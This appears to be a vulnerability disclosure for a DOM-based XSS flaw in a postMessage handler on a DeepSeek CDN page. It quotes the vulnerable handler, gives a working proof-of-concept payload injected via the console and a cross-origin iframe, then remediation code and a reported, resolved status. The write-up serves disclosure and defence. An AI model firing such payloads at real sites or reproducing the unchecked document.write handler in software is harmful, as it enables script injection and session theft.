During routine analysis, a DOM-based Cross-Site Scripting (XSS) vulnerability was identified on DeepSeek's CDN endpoint: https://cdn.deepseek.com/usercontent/usercontent.html. The vulnerability stems from improper handling of postMessage events, allowing an attacker to inject malicious scripts into the document context without proper origin validation or input sanitization.
The postMessage implementation on the affected endpoint processes messages without verifying their origin or properly sanitizing input. The following code snippet illustrates the root cause of the issue:
```javascript
window.addEventListener("message", (e) => {
  const keys = Object.keys(e.data);
  if (keys.length !== 1) return;
  if (!e.data.__deepseekCodeBlock) return;
  document.open();
  document.write(e.data.__deepseekCodeBlock);
  document.close();
  const style = document.createElement("style");
  style.textContent = "body { margin: 0; }";
  document.head.appendChild(style);
});
```

The function directly writes any `__deepseekCodeBlock` payload into the document using `document.write`, bypassing essential security measures such as:
- Origin Validation: No check to ensure the `postMessage` event originates from a trusted source.
- Input Sanitization: No filtering or escaping of HTML/JavaScript content in the payload.
The following postMessage payload can exploit the vulnerability to execute arbitrary JavaScript:

```javascript
postMessage(
  { __deepseekCodeBlock: '<script>alert(origin)</script>' },
  "*"
);
```

For easier testing, an iframe-based PoC was created to demonstrate the issue:
```html
<iframe
  width="600px"
  height="600px"
  src="https://cdn.deepseek.com/usercontent/usercontent.html"
  onload="this.contentWindow.postMessage( ({ __deepseekCodeBlock: '<script>alert(origin)</script>'}) ,'*')"
>
</iframe>
```

When this payload is executed:
- The browser processes the malicious payload.
- An alert box is displayed showing the `origin`, confirming the ability to inject and execute arbitrary JavaScript.
- Open https://cdn.deepseek.com/usercontent/usercontent.html in your browser.
- Open the browser console and execute:

```javascript
window.postMessage( { __deepseekCodeBlock: '<script>alert(origin)</script>' }, "*" );
```

- Alternatively, save and load the provided iframe-based exploit code in a browser.
- Validate Message Origin: Ensure that the `postMessage` event's `origin` matches https://cdn.deepseek.com:

```javascript
// Assumes DOMPurify is already loaded on the page (e.g. via a <script> tag).
window.addEventListener("message", (e) => {
  if (e.origin !== "https://cdn.deepseek.com") return;
  // Handle the message securely
  const data = e.data;
  // Example: sanitize and insert content
  if (data && data.__deepseekCodeBlock) {
    const sanitizedContent = DOMPurify.sanitize(data.__deepseekCodeBlock);
    const codeBlock = document.createElement("pre");
    codeBlock.textContent = sanitizedContent;
    document.body.appendChild(codeBlock);
  }
});
```

- Sanitize User Input: Use a library like DOMPurify to sanitize the HTML content before inserting it into the DOM. This helps prevent XSS attacks:

```javascript
const sanitizedContent = DOMPurify.sanitize(e.data.__deepseekCodeBlock);
```

- Avoid `document.write`: Replace `document.write` with modern DOM manipulation methods:

```javascript
const codeBlock = document.createElement("pre");
codeBlock.textContent = sanitizedContent;
document.body.appendChild(codeBlock);
```
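The hardened handler from the recommendations above, rewritten as pure functions so the origin and message-shape checks can be exercised outside a browser. This is an added example, not DeepSeek's code; the trusted-origin set and the sample events are assumptions constructed for illustration.

```javascript
// Added example (not DeepSeek's code): the fix above as pure functions, so the
// origin and shape checks can be exercised outside a browser.
// Assumption: https://cdn.deepseek.com is the only legitimate sender.
const TRUSTED_ORIGINS = new Set(["https://cdn.deepseek.com"]);

// Decide whether a message may be rendered. Returns { ok, reason, content }.
function validateCodeBlockMessage(origin, data, trusted = TRUSTED_ORIGINS) {
  if (!trusted.has(origin)) return { ok: false, reason: "untrusted origin" };
  if (data === null || typeof data !== "object") return { ok: false, reason: "payload is not an object" };
  const keys = Object.keys(data);
  if (keys.length !== 1 || keys[0] !== "__deepseekCodeBlock") return { ok: false, reason: "unexpected shape" };
  const content = data.__deepseekCodeBlock;
  if (typeof content !== "string" || content.length === 0) return { ok: false, reason: "code block is not a string" };
  return { ok: true, reason: "accepted", content };
}

// Serialisation of a <pre> whose textContent is `s`: markup becomes inert text.
function escapeHtml(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Hardened replacement for the vulnerable handler body. Returns the markup that
// would end up in the page, or null when the message is dropped.
function renderCodeBlock(event) {
  const v = validateCodeBlockMessage(event.origin, event.data);
  return v.ok ? `<pre>${escapeHtml(v.content)}</pre>` : null;
}

// Browser wiring (not executed here): textContent never parses markup, so the
// payload is displayed as code rather than interpreted.
function installHandler(win, doc) {
  win.addEventListener("message", (e) => {
    const v = validateCodeBlockMessage(e.origin, e.data);
    if (!v.ok) return;
    const pre = doc.createElement("pre");
    pre.textContent = v.content;
    doc.body.appendChild(pre);
  });
}

// Constructed sample events mirroring the PoC on the page (not captured traffic).
const SAMPLE_EVENTS = [
  { origin: "https://attacker.example", data: { __deepseekCodeBlock: "<script>alert(origin)</script>" } },
  { origin: "https://cdn.deepseek.com", data: { __deepseekCodeBlock: "<script>alert(origin)</script>" } },
  { origin: "https://cdn.deepseek.com", data: { __deepseekCodeBlock: "print('hi')", extra: 1 } },
];
for (const ev of SAMPLE_EVENTS) console.log(ev.origin, "->", renderCodeBlock(ev));
```

Because the destination is `textContent`, a code block containing `<script>` is shown as text rather than parsed, so this path does not depend on DOMPurify; the one-key shape check from the original handler is kept so that unexpected payloads are dropped as well.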
- Date of Discovery: January 31, 2025, 7:45:00 PM CST (Central Standard Time)
- Reported To DeepSeek: Yes
- Acknowledgment: Resolved
- Patch Status: Updated
This vulnerability allows attackers to execute arbitrary JavaScript in the context of cdn.deepseek.com. Potential impacts include:
- Theft of sensitive user data (e.g., cookies or session tokens).
- Defacement or injection of malicious content.
- Further exploitation of users accessing the compromised page.